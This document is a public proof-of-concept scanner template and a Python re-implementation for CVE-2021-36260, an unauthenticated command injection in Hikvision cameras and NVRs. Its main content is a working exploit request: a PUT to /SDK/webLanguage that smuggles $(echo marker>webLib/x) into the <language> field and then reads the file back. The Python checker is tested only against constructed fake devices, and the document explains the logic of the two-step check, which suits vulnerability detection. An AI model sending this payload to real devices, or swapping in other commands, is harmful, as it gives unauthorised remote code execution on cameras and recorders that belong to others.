A command injection vulnerability exists in the web server of some Hikvision products. Because of insufficient input validation, an unauthenticated attacker can exploit it to run commands on the device by sending messages that contain malicious commands.
PoC code [public]
id: CVE-2021-36260
info:
  name: Hikvision IP camera/NVR - Unauthenticated RCE
  author: pdteam,gy741
  severity: critical
  verified: true
  description: A command injection vulnerability exists in the web server of some Hikvision products. Because of insufficient input validation, an unauthenticated attacker can exploit it to run commands on the device by sending messages that contain malicious commands.
  reference:
    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://github.com/Aiminsun/CVE-2021-36260
  tags: cve,cve2021,rce,hikvision
  created: 2023/08/09
set:
  # Random marker that is written to the device and read back, so a match cannot be a coincidence.
  rand1: randomLowercase(16)
rules:
  r1:
    # Unauthenticated PUT to /SDK/webLanguage. The <language> value reaches a shell,
    # so the $(...) substitution writes the marker into webLib/x under the web root.
    request:
      method: PUT
      path: /SDK/webLanguage
      body: |
        <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{rand1}}>webLib/x)</language>
    # The endpoint answers the rejected language value with a 500 and a <ResponseStatus> XML body.
    expression: response.status == 500 && response.body.bcontains(b"<ResponseStatus")
  r2:
    # The file created by the injected command is served from the web root as /x;
    # only the marker coming back proves that the command actually ran.
    request:
      method: GET
      path: /x
    expression: response.status == 200 && response.body.bcontains(bytes(rand1))
expression: r1() && r2()
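The same two-step check as a stand-alone script, added here as an example; it is not part of the original PoC template or of the listed references. The checker takes a pluggable transport so the logic can be exercised offline against two constructed fake devices: the fakes, their response bodies and the "patched" device's behaviour are assumptions for illustration, not observed device output. Wiring it to a real target means replacing `send` with an HTTP client. Note that, like the template, a successful check leaves a file named x in the device's webLib directory.

```python
import re
import secrets
import string
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Request:
    method: str
    path: str
    body: bytes = b""


@dataclass
class Response:
    status: int
    body: bytes


# A transport is anything that turns a Request into a Response: an HTTP client
# pointed at a real device, or the offline fakes defined below.
Transport = Callable[[Request], Response]

# Same payload as the template: the injected $(...) writes the marker to webLib/x,
# which the device then serves as /x.
PAYLOAD_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<language>$(echo {marker}>webLib/x)</language>"
)


def random_marker(length: int = 16) -> str:
    """Equivalent of randomLowercase(16) in the template."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def check_cve_2021_36260(send: Transport, marker: Optional[str] = None) -> bool:
    """Run both rules of the template; True only if the marker comes back."""
    marker = marker or random_marker()
    payload = PAYLOAD_TEMPLATE.format(marker=marker).encode()
    r1 = send(Request("PUT", "/SDK/webLanguage", payload))
    # Rule r1: the endpoint answers the rejected language value with a 500 ResponseStatus.
    if not (r1.status == 500 and b"<ResponseStatus" in r1.body):
        return False
    # Rule r2: the marker written by the injected command is readable at /x.
    r2 = send(Request("GET", "/x"))
    return r2.status == 200 and marker.encode() in r2.body


# Constructed stand-in for an unpatched device (not a real device model): the
# <language> value reaches a shell, so a $(echo MARKER>webLib/NAME) substitution
# creates a file that the web root then serves.
class FakeVulnerableDevice:
    def __init__(self) -> None:
        self.weblib: Dict[str, bytes] = {}

    def __call__(self, req: Request) -> Response:
        if req.method == "PUT" and req.path == "/SDK/webLanguage":
            m = re.search(rb"\$\(echo ([a-z0-9]+)>webLib/([A-Za-z0-9_]+)\)", req.body)
            if m:
                self.weblib[m.group(2).decode()] = m.group(1) + b"\n"
            return Response(500, b'<?xml version="1.0" encoding="UTF-8"?><ResponseStatus/>')
        name = req.path.lstrip("/")
        if req.method == "GET" and name in self.weblib:
            return Response(200, self.weblib[name])
        return Response(404, b"")


# Constructed stand-in for a device that rejects the request without executing
# anything (assumed behaviour): r1 can still match on the fingerprint alone, but
# no file appears, so r2 fails and the check reports not vulnerable.
class FakePatchedDevice:
    def __call__(self, req: Request) -> Response:
        if req.method == "PUT" and req.path == "/SDK/webLanguage":
            return Response(500, b'<?xml version="1.0" encoding="UTF-8"?><ResponseStatus/>')
        return Response(404, b"")


if __name__ == "__main__":
    dev = FakeVulnerableDevice()
    print("vulnerable fake:", check_cve_2021_36260(dev))
    print("patched fake:", check_cve_2021_36260(FakePatchedDevice()))
```

The split between the two rules is the point: r1 only confirms that the endpoint exists and answers the way the writeup describes, so a device that matches r1 but not r2 is a fingerprint, not a finding. The random marker is what makes r2 conclusive, since a stale /x left by an earlier scan would not contain it.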